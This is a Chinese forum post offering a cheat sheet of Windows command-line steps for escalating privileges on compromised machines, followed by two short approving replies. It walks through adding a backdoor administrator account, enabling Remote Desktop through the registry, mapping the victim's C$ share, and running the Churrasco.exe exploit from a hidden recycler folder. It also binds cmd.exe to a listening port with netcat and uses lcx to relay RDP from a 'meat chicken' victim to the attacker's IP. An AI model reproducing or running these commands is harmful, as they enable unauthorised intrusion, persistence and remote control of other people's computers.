|高手勿入|cmd提权部分常用命令

lianghao

CMD部分提权常用命令
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net use z:127.0.0.1c$　　　　　映射对方的C盘
net user　　　　　　　　　　　　查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
———————————–
巴西烤肉 Churrasco.exe “命令”
使用方法：
C:\RECYCLER\Chu.exe “net user hucxsz hucxsz /add && net localgroup administrators hucxsz /add”
C:\RECYCLER\Chu.exe “net user admin$ /del” 删除帐号
query user 查看会话
logoff ID号 踢掉
C:\RECYCLER\Chu.exe “logoff 1″
———————————–
NC反弹
路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上传
DOS界面下运行:
NC -vv www.baidu.com 80<1.txt
-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包
———————————–
LCX端口转发
先本地监听51端口 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389 LCX转发
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389

Lzzh

这是红盟工具包里的吧。。。。

mojitingliu

总结的不错哦
哈哈